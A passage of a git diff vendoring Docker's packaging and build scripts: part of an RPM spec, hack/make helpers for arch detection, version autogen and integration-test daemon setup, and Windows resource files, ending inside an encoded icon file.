most are already in the container (see contrib/builder/rpm/ARCH/generate.sh) +# only require systemd on those systems +%if 0%{?is_systemd} +%if 0%{?suse_version} >= 1210 +BuildRequires: systemd-rpm-macros +%{?systemd_requires} +%else +%if 0%{?fedora} >= 25 +# Systemd 230 and up no longer have libsystemd-journal (see https://bugzilla.redhat.com/show_bug.cgi?id=1350301) +BuildRequires: pkgconfig(systemd) +Requires: systemd-units +%else +BuildRequires: pkgconfig(systemd) +Requires: systemd-units +BuildRequires: pkgconfig(libsystemd-journal) +%endif +%endif +%else +Requires(post): chkconfig +Requires(preun): chkconfig +# This is for /sbin/service +Requires(preun): initscripts +%endif + +# required packages on install +Requires: /bin/sh +Requires: iptables +%if !0%{?suse_version} +Requires: libcgroup +%else +Requires: libcgroup1 +%endif +Requires: tar +Requires: xz +%if 0%{?fedora} >= 21 || 0%{?centos} >= 7 || 0%{?rhel} >= 7 || 0%{?oraclelinux} >= 7 +# Resolves: rhbz#1165615 +Requires: device-mapper-libs >= 1.02.90-1 +%endif +%if 0%{?oraclelinux} >= 6 +# Require Oracle Unbreakable Enterprise Kernel R4 and newer device-mapper +Requires: kernel-uek >= 4.1 +Requires: device-mapper >= 1.02.90-2 +%endif + +# docker-selinux conditional +%if 0%{?fedora} >= 20 || 0%{?centos} >= 7 || 0%{?rhel} >= 7 || 0%{?oraclelinux} >= 7 +%global with_selinux 1 +%endif + +# DWZ problem with multiple golang binary, see bug +# https://bugzilla.redhat.com/show_bug.cgi?id=995136#c12 +%if 0%{?fedora} >= 20 || 0%{?rhel} >= 7 || 0%{?oraclelinux} >= 7 +%global _dwz_low_mem_die_limit 0 +%endif + +# start if with_selinux +%if 0%{?with_selinux} +# Version of SELinux we were using +%if 0%{?fedora} == 20 +%global selinux_policyver 3.12.1-197 +%endif # fedora 20 +%if 0%{?fedora} == 21 +%global selinux_policyver 3.13.1-105 +%endif # fedora 21 +%if 0%{?fedora} >= 22 +%global selinux_policyver 3.13.1-128 +%endif # fedora 22 +%if 0%{?centos} >= 7 || 0%{?rhel} >= 7 || 0%{?oraclelinux} >= 7 +%global selinux_policyver 3.13.1-23 +%endif # centos,oraclelinux 7 +%endif # with_selinux + +# RE: rhbz#1195804 - ensure min NVR for selinux-policy +%if 0%{?with_selinux} +Requires: selinux-policy >= %{selinux_policyver} +Requires(pre): %{name}-selinux >= %{version}-%{release} +%endif # with_selinux + +# conflicting packages +Conflicts: docker +Conflicts: docker-io +Conflicts: docker-engine-cs + +%description +Docker is an open source project to build, ship and run any application as a +lightweight container. + +Docker containers are both hardware-agnostic and platform-agnostic. This means +they can run anywhere, from your laptop to the largest EC2 compute instance and +everything in between - and they don't require you to use a particular +language, framework or packaging system. That makes them great building blocks +for deploying and scaling web apps, databases, and backend services without +depending on a particular stack or provider. + +%prep +%if 0%{?centos} <= 6 || 0%{?oraclelinux} <=6 +%setup -n %{name} +%else +%autosetup -n %{name} +%endif + +%build +export DOCKER_GITCOMMIT=%{_gitcommit} +./hack/make.sh dynbinary +# ./man/md2man-all.sh runs outside the build container (if at all), since we don't have go-md2man here + +%check +./bundles/%{_origversion}/dynbinary-client/docker -v +./bundles/%{_origversion}/dynbinary-daemon/dockerd -v + +%install +# install binary +install -d $RPM_BUILD_ROOT/%{_bindir} +install -p -m 755 bundles/%{_origversion}/dynbinary-client/docker-%{_origversion} $RPM_BUILD_ROOT/%{_bindir}/docker +install -p -m 755 bundles/%{_origversion}/dynbinary-daemon/dockerd-%{_origversion} $RPM_BUILD_ROOT/%{_bindir}/dockerd + +# install proxy +install -p -m 755 /usr/local/bin/docker-proxy $RPM_BUILD_ROOT/%{_bindir}/docker-proxy + +# install containerd +install -p -m 755 /usr/local/bin/docker-containerd $RPM_BUILD_ROOT/%{_bindir}/docker-containerd +install -p -m 755 /usr/local/bin/docker-containerd-shim $RPM_BUILD_ROOT/%{_bindir}/docker-containerd-shim +install -p -m 755 /usr/local/bin/docker-containerd-ctr $RPM_BUILD_ROOT/%{_bindir}/docker-containerd-ctr + +# install runc +install -p -m 755 /usr/local/bin/docker-runc $RPM_BUILD_ROOT/%{_bindir}/docker-runc + +# install tini +install -p -m 755 /usr/local/bin/docker-init $RPM_BUILD_ROOT/%{_bindir}/docker-init + +# install udev rules +install -d $RPM_BUILD_ROOT/%{_sysconfdir}/udev/rules.d +install -p -m 644 contrib/udev/80-docker.rules $RPM_BUILD_ROOT/%{_sysconfdir}/udev/rules.d/80-docker.rules + +# add init scripts +install -d $RPM_BUILD_ROOT/etc/sysconfig +install -d $RPM_BUILD_ROOT/%{_initddir} + + +%if 0%{?is_systemd} +install -d $RPM_BUILD_ROOT/%{_unitdir} +install -p -m 644 contrib/init/systemd/docker.service.rpm $RPM_BUILD_ROOT/%{_unitdir}/docker.service +%else +install -p -m 644 contrib/init/sysvinit-redhat/docker.sysconfig $RPM_BUILD_ROOT/etc/sysconfig/docker +install -p -m 755 contrib/init/sysvinit-redhat/docker $RPM_BUILD_ROOT/%{_initddir}/docker +%endif +# add bash, zsh, and fish completions +install -d $RPM_BUILD_ROOT/usr/share/bash-completion/completions +install -d $RPM_BUILD_ROOT/usr/share/zsh/vendor-completions +install -d $RPM_BUILD_ROOT/usr/share/fish/vendor_completions.d +install -p -m 644 contrib/completion/bash/docker $RPM_BUILD_ROOT/usr/share/bash-completion/completions/docker +install -p -m 644 contrib/completion/zsh/_docker $RPM_BUILD_ROOT/usr/share/zsh/vendor-completions/_docker +install -p -m 644 contrib/completion/fish/docker.fish $RPM_BUILD_ROOT/usr/share/fish/vendor_completions.d/docker.fish + +# install manpages +install -d %{buildroot}%{_mandir}/man1 +install -p -m 644 man/man1/*.1 $RPM_BUILD_ROOT/%{_mandir}/man1 +install -d %{buildroot}%{_mandir}/man5 +install -p -m 644 man/man5/*.5 $RPM_BUILD_ROOT/%{_mandir}/man5 +install -d %{buildroot}%{_mandir}/man8 +install -p -m 644 man/man8/*.8 $RPM_BUILD_ROOT/%{_mandir}/man8 + +# add vimfiles +install -d $RPM_BUILD_ROOT/usr/share/vim/vimfiles/doc +install -d $RPM_BUILD_ROOT/usr/share/vim/vimfiles/ftdetect +install -d $RPM_BUILD_ROOT/usr/share/vim/vimfiles/syntax +install -p -m 644 contrib/syntax/vim/doc/dockerfile.txt $RPM_BUILD_ROOT/usr/share/vim/vimfiles/doc/dockerfile.txt +install -p -m 644 contrib/syntax/vim/ftdetect/dockerfile.vim $RPM_BUILD_ROOT/usr/share/vim/vimfiles/ftdetect/dockerfile.vim +install -p -m 644 contrib/syntax/vim/syntax/dockerfile.vim $RPM_BUILD_ROOT/usr/share/vim/vimfiles/syntax/dockerfile.vim + +# add nano +install -d $RPM_BUILD_ROOT/usr/share/nano +install -p -m 644 contrib/syntax/nano/Dockerfile.nanorc $RPM_BUILD_ROOT/usr/share/nano/Dockerfile.nanorc + +# list files owned by the package here +%files +%doc AUTHORS CHANGELOG.md CONTRIBUTING.md LICENSE MAINTAINERS NOTICE README.md +/%{_bindir}/docker +/%{_bindir}/dockerd +/%{_bindir}/docker-containerd +/%{_bindir}/docker-containerd-shim +/%{_bindir}/docker-containerd-ctr +/%{_bindir}/docker-proxy +/%{_bindir}/docker-runc +/%{_bindir}/docker-init +/%{_sysconfdir}/udev/rules.d/80-docker.rules +%if 0%{?is_systemd} +/%{_unitdir}/docker.service +%else +%config(noreplace,missingok) /etc/sysconfig/docker +/%{_initddir}/docker +%endif +/usr/share/bash-completion/completions/docker +/usr/share/zsh/vendor-completions/_docker +/usr/share/fish/vendor_completions.d/docker.fish +%doc +/%{_mandir}/man1/* +/%{_mandir}/man5/* +/%{_mandir}/man8/* +/usr/share/vim/vimfiles/doc/dockerfile.txt +/usr/share/vim/vimfiles/ftdetect/dockerfile.vim +/usr/share/vim/vimfiles/syntax/dockerfile.vim +/usr/share/nano/Dockerfile.nanorc + +%post +%if 0%{?is_systemd} +%systemd_post docker +%else +# This adds the proper /etc/rc*.d links for the script +/sbin/chkconfig --add docker +%endif +if ! getent group docker > /dev/null; then + groupadd --system docker +fi + +%preun +%if 0%{?is_systemd} +%systemd_preun docker +%else +if [ $1 -eq 0 ] ; then + /sbin/service docker stop >/dev/null 2>&1 + /sbin/chkconfig --del docker +fi +%endif + +%postun +%if 0%{?is_systemd} +%systemd_postun_with_restart docker +%else +if [ "$1" -ge "1" ] ; then + /sbin/service docker condrestart >/dev/null 2>&1 || : +fi +%endif + +%changelog diff --git a/vendor/github.com/docker/docker/hack/make/.detect-daemon-osarch b/vendor/github.com/docker/docker/hack/make/.detect-daemon-osarch new file mode 100644 index 0000000000..73955392d0 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/.detect-daemon-osarch @@ -0,0 +1,69 @@ +#!/bin/bash +set -e + +docker-version-osarch() { + local target="$1" # "Client" or "Server" + local fmtStr="{{.${target}.Os}}/{{.${target}.Arch}}" + if docker version -f "$fmtStr" 2>/dev/null; then + # if "docker version -f" works, let's just use that! + return + fi + docker version | awk ' + $1 ~ /^(Client|Server):$/ { section = 0 } + $1 == "'"$target"':" { section = 1; next } + section && $1 == "OS/Arch:" { print $2 } + + # old versions of Docker + $1 == "OS/Arch" && $2 == "('"${target,,}"'):" { print $3 } + ' +} + +# Retrieve OS/ARCH of docker daemon, e.g. linux/amd64 +export DOCKER_ENGINE_OSARCH="$(docker-version-osarch 'Server')" +export DOCKER_ENGINE_GOOS="${DOCKER_ENGINE_OSARCH%/*}" +export DOCKER_ENGINE_GOARCH="${DOCKER_ENGINE_OSARCH##*/}" +DOCKER_ENGINE_GOARCH=${DOCKER_ENGINE_GOARCH:=amd64} + +# and the client, just in case +export DOCKER_CLIENT_OSARCH="$(docker-version-osarch 'Client')" +export DOCKER_CLIENT_GOOS="${DOCKER_CLIENT_OSARCH%/*}" +export DOCKER_CLIENT_GOARCH="${DOCKER_CLIENT_OSARCH##*/}" +DOCKER_CLIENT_GOARCH=${DOCKER_CLIENT_GOARCH:=amd64} + +# Retrieve the architecture used in contrib/builder/(deb|rpm)/$PACKAGE_ARCH/ +PACKAGE_ARCH='amd64' +case "${DOCKER_ENGINE_GOARCH:-$DOCKER_CLIENT_GOARCH}" in + arm) + PACKAGE_ARCH='armhf' + ;; + arm64) + PACKAGE_ARCH='aarch64' + ;; + amd64|ppc64le|s390x) + PACKAGE_ARCH="${DOCKER_ENGINE_GOARCH:-$DOCKER_CLIENT_GOARCH}" + ;; + *) + echo >&2 "warning: not sure how to convert '$DOCKER_ENGINE_GOARCH' to a 'Docker' arch, assuming '$PACKAGE_ARCH'" + ;; +esac +export PACKAGE_ARCH + +DOCKERFILE='Dockerfile' +TEST_IMAGE_NAMESPACE= +case "$PACKAGE_ARCH" in + amd64) + case "${DOCKER_ENGINE_GOOS:-$DOCKER_CLIENT_GOOS}" in + windows) + DOCKERFILE='Dockerfile.windows' + ;; + solaris) + DOCKERFILE='Dockerfile.solaris' + ;; + esac + ;; + *) + DOCKERFILE="Dockerfile.$PACKAGE_ARCH" + TEST_IMAGE_NAMESPACE="$PACKAGE_ARCH" + ;; +esac +export DOCKERFILE TEST_IMAGE_NAMESPACE diff --git a/vendor/github.com/docker/docker/hack/make/.ensure-emptyfs b/vendor/github.com/docker/docker/hack/make/.ensure-emptyfs new file mode 100644 index 0000000000..e71a30ae81 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/.ensure-emptyfs @@ -0,0 +1,23 @@ +#!/bin/bash +set -e + +if ! docker inspect emptyfs &> /dev/null; then + # let's build a "docker save" tarball for "emptyfs" + # see https://github.com/docker/docker/pull/5262 + # and also https://github.com/docker/docker/issues/4242 + dir="$DEST/emptyfs" + mkdir -p "$dir" + ( + cd "$dir" + echo '{"emptyfs":{"latest":"511136ea3c5a64f264b78b5433614aec563103b4d4702f3ba7d4d2698e22c158"}}' > repositories + mkdir -p 511136ea3c5a64f264b78b5433614aec563103b4d4702f3ba7d4d2698e22c158 + ( + cd 511136ea3c5a64f264b78b5433614aec563103b4d4702f3ba7d4d2698e22c158 + echo '{"id":"511136ea3c5a64f264b78b5433614aec563103b4d4702f3ba7d4d2698e22c158","comment":"Imported from -","created":"2013-06-13T14:03:50.821769-07:00","container_config":{"Hostname":"","Domainname":"","User":"","Memory":0,"MemorySwap":0,"CpuShares":0,"AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"PortSpecs":null,"ExposedPorts":null,"Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":null,"Cmd":null,"Image":"","Volumes":null,"WorkingDir":"","Entrypoint":null,"NetworkDisabled":false,"OnBuild":null},"docker_version":"0.4.0","architecture":"x86_64","Size":0}' > json + echo '1.0' > VERSION + tar -cf layer.tar --files-from /dev/null + ) + ) + ( set -x; tar -cC "$dir" . | docker load ) + rm -rf "$dir" +fi diff --git a/vendor/github.com/docker/docker/hack/make/.go-autogen b/vendor/github.com/docker/docker/hack/make/.go-autogen new file mode 100644 index 0000000000..4d26052bb7 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/.go-autogen @@ -0,0 +1,86 @@ +#!/bin/bash + +rm -rf autogen + +source hack/dockerfile/binaries-commits + +cat > dockerversion/version_autogen.go < dockerversion/version_autogen_unix.go < + +param( + [Parameter(Mandatory=$true)][string]$CommitString, + [Parameter(Mandatory=$true)][string]$DockerVersion +) + +$ErrorActionPreference = "Stop" + +# Utility function to get the build date/time in UTC +Function Get-BuildDateTime() { + return $(Get-Date).ToUniversalTime() +} + +try { + $buildDateTime=Get-BuildDateTime + + if (Test-Path ".\autogen") { + Remove-Item ".\autogen" -Recurse -Force | Out-Null + } + + $fileContents = ' +// +build autogen + +// Package dockerversion is auto-generated at build-time +package dockerversion + +// Default build-time variable for library-import. +// This file is overridden on build with build-time informations. +const ( + GitCommit string = "'+$CommitString+'" + Version string = "'+$DockerVersion+'" + BuildTime string = "'+$buildDateTime+'" +) + +// AUTOGENERATED FILE; see hack\make\.go-autogen.ps1 +' + + # Write the file without BOM + $outputFile="$(pwd)\dockerversion\version_autogen.go" + if (Test-Path $outputFile) { Remove-Item $outputFile } + [System.IO.File]::WriteAllText($outputFile, $fileContents, (New-Object System.Text.UTF8Encoding($False))) + + New-Item -ItemType Directory -Path "autogen\winresources\tmp" | Out-Null + New-Item -ItemType Directory -Path "autogen\winresources\docker" | Out-Null + New-Item -ItemType Directory -Path "autogen\winresources\dockerd" | Out-Null + Copy-Item "hack\make\.resources-windows\resources.go" "autogen\winresources\docker" + Copy-Item "hack\make\.resources-windows\resources.go" "autogen\winresources\dockerd" + + # Generate a version in the form major,minor,patch,build + $versionQuad=$DockerVersion -replace "[^0-9.]*" -replace "\.", "," + + # Compile the messages + windmc hack\make\.resources-windows\event_messages.mc -h autogen\winresources\tmp -r autogen\winresources\tmp + if ($LASTEXITCODE -ne 0) { Throw "Failed to compile event message resources" } + + # If you really want to understand this madness below, search the Internet for powershell variables after verbatim arguments... Needed to get double-quotes passed through to the compiler options. + # Generate the .syso files containing all the resources and manifest needed to compile the final docker binaries. Both 32 and 64-bit clients. + $env:_ag_dockerVersion=$DockerVersion + $env:_ag_gitCommit=$CommitString + + windres -i hack/make/.resources-windows/docker.rc -o autogen/winresources/docker/rsrc_amd64.syso -F pe-x86-64 --use-temp-file -I autogen/winresources/tmp -D DOCKER_VERSION_QUAD=$versionQuad --% -D DOCKER_VERSION=\"%_ag_dockerVersion%\" -D DOCKER_COMMIT=\"%_ag_gitCommit%\" + if ($LASTEXITCODE -ne 0) { Throw "Failed to compile client 64-bit resources" } + + windres -i hack/make/.resources-windows/docker.rc -o autogen/winresources/docker/rsrc_386.syso -F pe-i386 --use-temp-file -I autogen/winresources/tmp -D DOCKER_VERSION_QUAD=$versionQuad --% -D DOCKER_VERSION=\"%_ag_dockerVersion%\" -D DOCKER_COMMIT=\"%_ag_gitCommit%\" + if ($LASTEXITCODE -ne 0) { Throw "Failed to compile client 32-bit resources" } + + windres -i hack/make/.resources-windows/dockerd.rc -o autogen/winresources/dockerd/rsrc_amd64.syso -F pe-x86-64 --use-temp-file -I autogen/winresources/tmp -D DOCKER_VERSION_QUAD=$versionQuad --% -D DOCKER_VERSION=\"%_ag_dockerVersion%\" -D DOCKER_COMMIT=\"%_ag_gitCommit%\" + if ($LASTEXITCODE -ne 0) { Throw "Failed to compile daemon resources" } +} +Catch [Exception] { + # Throw the error onto the caller to display errors. We don't expect this script to be called directly + Throw ".go-autogen.ps1 failed with error $_" +} +Finally { + Remove-Item .\autogen\winresources\tmp -Recurse -Force -ErrorAction SilentlyContinue | Out-Null + $env:_ag_dockerVersion="" + $env:_ag_gitCommit="" +} diff --git a/vendor/github.com/docker/docker/hack/make/.integration-daemon-setup b/vendor/github.com/docker/docker/hack/make/.integration-daemon-setup new file mode 100644 index 0000000000..0efde717fc --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/.integration-daemon-setup @@ -0,0 +1,7 @@ +#!/bin/bash +set -e + +bundle .detect-daemon-osarch +if [ $DOCKER_ENGINE_GOOS != "windows" ]; then + bundle .ensure-emptyfs +fi diff --git a/vendor/github.com/docker/docker/hack/make/.integration-daemon-start b/vendor/github.com/docker/docker/hack/make/.integration-daemon-start new file mode 100644 index 0000000000..b96979bdb2 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/.integration-daemon-start @@ -0,0 +1,116 @@ +#!/bin/bash + +# see test-integration-cli for example usage of this script + +base="$ABS_DEST/.." +export PATH="$base/binary-client:$base/binary-daemon:$base/dynbinary-client:$base/dynbinary-daemon:$PATH" + +if ! command -v docker &> /dev/null; then + echo >&2 'error: binary-client or dynbinary-client must be run before .integration-daemon-start' + false +fi + +# This is a temporary hack for split-binary mode. It can be removed once +# https://github.com/docker/docker/pull/22134 is merged into docker master +if [ "$(go env GOOS)" = 'windows' ]; then + return +fi + +if [ -z "$DOCKER_TEST_HOST" ]; then + if docker version &> /dev/null; then + echo >&2 'skipping daemon start, since daemon appears to be already started' + return + fi +fi + +if ! command -v dockerd &> /dev/null; then + echo >&2 'error: binary-daemon or dynbinary-daemon must be run before .integration-daemon-start' + false +fi + +# intentionally open a couple bogus file descriptors to help test that they get scrubbed in containers +exec 41>&1 42>&2 + +export DOCKER_GRAPHDRIVER=${DOCKER_GRAPHDRIVER:-vfs} +export DOCKER_USERLANDPROXY=${DOCKER_USERLANDPROXY:-true} + +# example usage: DOCKER_STORAGE_OPTS="dm.basesize=20G,dm.loopdatasize=200G" +storage_params="" +if [ -n "$DOCKER_STORAGE_OPTS" ]; then + IFS=',' + for i in ${DOCKER_STORAGE_OPTS}; do + storage_params="--storage-opt $i $storage_params" + done + unset IFS +fi + +# example usage: DOCKER_STORAGE_OPTS="dm.basesize=20G,dm.loopdatasize=200G" +extra_params="" +if [ "$DOCKER_REMAP_ROOT" ]; then + extra_params="--userns-remap $DOCKER_REMAP_ROOT" +fi + +if [ "$DOCKER_EXPERIMENTAL" ]; then + echo >&2 '# DOCKER_EXPERIMENTAL is set: starting daemon with experimental features enabled! ' + extra_params="$extra_params --experimental" +fi + +if [ -z "$DOCKER_TEST_HOST" ]; then + # Start apparmor if it is enabled + if [ -e "/sys/module/apparmor/parameters/enabled" ] && [ "$(cat /sys/module/apparmor/parameters/enabled)" == "Y" ]; then + # reset container variable so apparmor profile is applied to process + # see https://github.com/docker/libcontainer/blob/master/apparmor/apparmor.go#L16 + export container="" + ( + set -x + /etc/init.d/apparmor start + ) + fi + + export DOCKER_HOST="unix://$(cd "$DEST" && pwd)/docker.sock" # "pwd" tricks to make sure $DEST is an absolute path, not a relative one + ( set -x; exec \ + dockerd --debug \ + --host "$DOCKER_HOST" \ + --storage-driver "$DOCKER_GRAPHDRIVER" \ + --pidfile "$DEST/docker.pid" \ + --userland-proxy="$DOCKER_USERLANDPROXY" \ + $storage_params \ + $extra_params \ + &> "$DEST/docker.log" + ) & + # make sure that if the script exits unexpectedly, we stop this daemon we just started + trap 'bundle .integration-daemon-stop' EXIT +else + export DOCKER_HOST="$DOCKER_TEST_HOST" +fi + +# give it a little time to come up so it's "ready" +tries=60 +echo "INFO: Waiting for daemon to start..." +while ! docker version &> /dev/null; do + (( tries-- )) + if [ $tries -le 0 ]; then + printf "\n" + if [ -z "$DOCKER_HOST" ]; then + echo >&2 "error: daemon failed to start" + echo >&2 " check $DEST/docker.log for details" + else + echo >&2 "error: daemon at $DOCKER_HOST fails to 'docker version':" + docker version >&2 || true + # Additional Windows CI debugging as this is a common error as of + # January 2016 + if [ "$(go env GOOS)" = 'windows' ]; then + echo >&2 "Container log below:" + echo >&2 "---" + # Important - use the docker on the CI host, not the one built locally + # which is currently in our path. + ! /c/bin/docker -H=$MAIN_DOCKER_HOST logs docker-$COMMITHASH + echo >&2 "---" + fi + fi + false + fi + printf "." + sleep 2 +done +printf "\n" diff --git a/vendor/github.com/docker/docker/hack/make/.integration-daemon-stop b/vendor/github.com/docker/docker/hack/make/.integration-daemon-stop new file mode 100644 index 0000000000..03c1b14689 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/.integration-daemon-stop @@ -0,0 +1,27 @@ +#!/bin/bash + +if [ ! "$(go env GOOS)" = 'windows' ]; then + trap - EXIT # reset EXIT trap applied in .integration-daemon-start + + for pidFile in $(find "$DEST" -name docker.pid); do + pid=$(set -x; cat "$pidFile") + ( set -x; kill "$pid" ) + if ! wait "$pid"; then + echo >&2 "warning: PID $pid from $pidFile had a nonzero exit code" + fi + done + + if [ -z "$DOCKER_TEST_HOST" ]; then + # Stop apparmor if it is enabled + if [ -e "/sys/module/apparmor/parameters/enabled" ] && [ "$(cat /sys/module/apparmor/parameters/enabled)" == "Y" ]; then + ( + set -x + /etc/init.d/apparmor stop + ) + fi + fi +else + # Note this script is not actionable on Windows to Linux CI. Instead the + # DIND daemon under test is torn down by the Jenkins tear-down script + echo "INFO: Not stopping daemon on Windows CI" +fi diff --git a/vendor/github.com/docker/docker/hack/make/.integration-test-helpers b/vendor/github.com/docker/docker/hack/make/.integration-test-helpers new file mode 100644 index 0000000000..7b73b2f140 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/.integration-test-helpers @@ -0,0 +1,79 @@ +#!/bin/bash + +: ${TEST_REPEAT:=0} + +bundle_test_integration_cli() { + TESTFLAGS="$TESTFLAGS -check.v -check.timeout=${TIMEOUT} -test.timeout=360m" + go_test_dir integration-cli $DOCKER_INTEGRATION_TESTS_VERIFIED +} + +# If $TESTFLAGS is set in the environment, it is passed as extra arguments to 'go test'. +# You can use this to select certain tests to run, e.g. +# +# TESTFLAGS='-test.run ^TestBuild$' ./hack/make.sh test-unit +# +# For integration-cli test, we use [gocheck](https://labix.org/gocheck), if you want +# to run certain tests on your local host, you should run with command: +# +# TESTFLAGS='-check.f DockerSuite.TestBuild*' ./hack/make.sh binary test-integration-cli +# +go_test_dir() { + dir=$1 + precompiled=$2 + testbinary="$DEST/test.main" + testcover=() + testcoverprofile=() + ( + mkdir -p "$DEST/coverprofiles" + export DEST="$ABS_DEST" # in a subshell this is safe -- our integration-cli tests need DEST, and "cd" screws it up + if [ -z $precompiled ]; then + ensure_test_dir $1 $testbinary + fi + cd "$dir" + i=0 + while ((++i)); do + test_env "$testbinary" $TESTFLAGS + if [ $i -gt "$TEST_REPEAT" ]; then + break + fi + echo "Repeating test ($i)" + done + ) +} + +ensure_test_dir() { + ( + # make sure a test dir will compile + dir="$1" + out="$2" + echo Building test dir: "$dir" + set -xe + cd "$dir" + go test -c -o "$out" -ldflags "$LDFLAGS" "${BUILDFLAGS[@]}" + ) +} + +test_env() { + ( + set -xe + # use "env -i" to tightly control the environment variables that bleed into the tests + env -i \ + DEST="$DEST" \ + DOCKER_TLS_VERIFY="$DOCKER_TEST_TLS_VERIFY" \ + DOCKER_CERT_PATH="$DOCKER_TEST_CERT_PATH" \ + DOCKER_ENGINE_GOARCH="$DOCKER_ENGINE_GOARCH" \ + DOCKER_GRAPHDRIVER="$DOCKER_GRAPHDRIVER" \ + DOCKER_USERLANDPROXY="$DOCKER_USERLANDPROXY" \ + DOCKER_HOST="$DOCKER_HOST" \ + DOCKER_REMAP_ROOT="$DOCKER_REMAP_ROOT" \ + DOCKER_REMOTE_DAEMON="$DOCKER_REMOTE_DAEMON" \ + DOCKERFILE="$DOCKERFILE" \ + GOPATH="$GOPATH" \ + GOTRACEBACK=all \ + HOME="$ABS_DEST/fake-HOME" \ + PATH="$PATH" \ + TEMP="$TEMP" \ + TEST_IMAGE_NAMESPACE="$TEST_IMAGE_NAMESPACE" \ + "$@" + ) +} diff --git a/vendor/github.com/docker/docker/hack/make/.resources-windows/common.rc b/vendor/github.com/docker/docker/hack/make/.resources-windows/common.rc new file mode 100644 index 0000000000..000fb35367 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/.resources-windows/common.rc @@ -0,0 +1,38 @@ +// Application icon +1 ICON "docker.ico" + +// Windows executable manifest +1 24 /* RT_MANIFEST */ "docker.exe.manifest" + +// Version information +1 VERSIONINFO + +#ifdef DOCKER_VERSION_QUAD +FILEVERSION DOCKER_VERSION_QUAD +PRODUCTVERSION DOCKER_VERSION_QUAD +#endif + +BEGIN + BLOCK "StringFileInfo" + BEGIN + BLOCK "000004B0" + BEGIN + VALUE "ProductName", DOCKER_NAME + +#ifdef DOCKER_VERSION + VALUE "FileVersion", DOCKER_VERSION + VALUE "ProductVersion", DOCKER_VERSION +#endif + +#ifdef DOCKER_COMMIT + VALUE "OriginalFileName", DOCKER_COMMIT +#endif + + END + END + + BLOCK "VarFileInfo" + BEGIN + VALUE "Translation", 0x0000, 0x04B0 + END +END diff --git a/vendor/github.com/docker/docker/hack/make/.resources-windows/docker.exe.manifest b/vendor/github.com/docker/docker/hack/make/.resources-windows/docker.exe.manifest new file mode 100644 index 0000000000..674bc9422b --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/.resources-windows/docker.exe.manifest @@ -0,0 +1,18 @@ + + + Docker + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/vendor/github.com/docker/docker/hack/make/.resources-windows/docker.ico b/vendor/github.com/docker/docker/hack/make/.resources-windows/docker.ico new file mode 100644 index 0000000000000000000000000000000000000000..c6506ec8dbd8e295d98a084412e9d2c358a6ba39 GIT binary patch literal 370070 zcmeEP2Y405+TL?c0%F4sD!rrFr6_v!{$4AJ1?*S7-fQo@E1)91i}a!b(rX$m0Ro|S zl8_#Huc9K5%>TY~c9PA>Nlzfm^YzX_0Ys1`^UF*YMa1~pn zQjstq44g3rHUvNJ**NcYPxRuB0h?D14oKMWTR>{++JN8Fl)E5}8uGT~8vB{$p7Fiq z3GHSD%>rR6Jw0Ie?|buOFq?qadi(lEl=jLTyr^ZHo z7akkcdFke*UDm`d?HV1stb2UylFl*Mw>EBh&(-lO`z&8Q{gHVQeLchH_qMvv>*e}n zb`R@6u;-^>-%l(WU_HF#C+qHIL#^iPMp?BEgn-W;06W+I1Ne$J)^pInx>VeC~g3qScfHtL7TiJK;c zro@FsC2sibAoeS4E1a*Ay8wPnjH6}NVbS~}?= zHMiddDy*BO!n(Tvrj~*aP;+{E0bihiKd`-Zc6VzT(lGdjX$$&WgBJa0y}Pi#)e_s) zR*keSKCsZL)V-|m<$Jfyd z-o1A7ioUNV$IkjTe$BAx#ElbAr6kOUZO^qaPo*S8*tWem9d>>)HF4pIl*EV=DGA}g zd>)^cf%v&;h$Yguq%KQO*f=45`IJY~X7>zC3+`;Cg?6>lVDqPJoJ4xU#!1WtoC4B; z4BvpVYxOjiWzj9ySk~ zj(}}PoWwS5JlzJ$;2-ocJkEi*xoS)D61{KjocGk+{+Fnb&USy_!wp-`?DzfIHuk04 zFn)qQ!uShQrsyM#pD^(Q(w*=PD-kP9!Cc~th!YyYCtT(f|D>-i*VK-P5qe^taiEMB zoZLvh{4lV2c^`MurtuklJ?{+T@Ou+CP3WDpX;QL|-4nuL&#+y@>4@QJJ&(`1Pa2$OBeT0r57&rJH2VbBt z&#)aa!U*_-k1#*b+*iUO-7F8EIr#3EZDF7+G7!IZxM%mlR9EbhuDY*}jqF%Ee(i|& zF=mfTiJN^qIev~xO~lw-_wC`Zb@uDFAIQnJ^V*MbLTVD{03y|zu(#CgUgxNgA7Jma z`yP4r_xZK=ypA*ez{Cpl4SFmQYR@qsKKKLUhB(9rLos&v=c?h}@q&?aw-+oIVupaF zc=l-aNh%DK1qL>+=z}@@p`PtqmU-=dafj;@H;x~H`T0Z1@p}B8o{|`W{+?rY_VJFG zy(oFu{+8q@l^8ukEgAa{ZTF$wX!nfui@nb;Or7)t977Q1{B({P;0tyDzu?)yODjiM z=NdV~U%0p)0dtKqe`rXNv{W(>z2IXv*5T;*b?R%Dd-Jj$EfUs^o|YUNl*V`*^K`U% z_VLAM^TuD$_EVRu&8vs0@Ike`Iz?gm|(@QtaFN`QW>OC6^eoQHN)Mh3E?_c-8BELrU~mtO-zmr{uBK? z;`;@(dyMIev9C9F&lE8QZGY3^E^1Ei^HgXT+L7mU+jCK`XJP|0caY9G1NeeC_=3Jz zU({47uiaz3;6kk6VN6h=luT~6)G-jf@MAZg*Xg;v^+D|}k6$yiJK}uUI_y4i0sH!* zkLjJZ?whCW`t*Vqksn<1UWzdAZ-(S?-u6ou0xNe=DEUd*l2PwtLg>rz}_N=6wvi zcYB|~m7cMFPPSdp{bml4_h({)&F}+XE*s{3o;c=RtWCxmBg6?351c0bugI6#IPW#r z#<{O*+h055!J6@_hfT!#J=#6S^&H>x*?ck0>E%=p$NRAT_2FN5pTBp{*Yo^>+Fofp zUdIGx?hs>u!+1u}W9bm95%rPpAn=(1)*p! z>{uVRUqa)1UmsxGKF9lE-79(5@SeVBd!@lA=$L@<0DS@04;{fcU@-hZUA4nIM}T=m 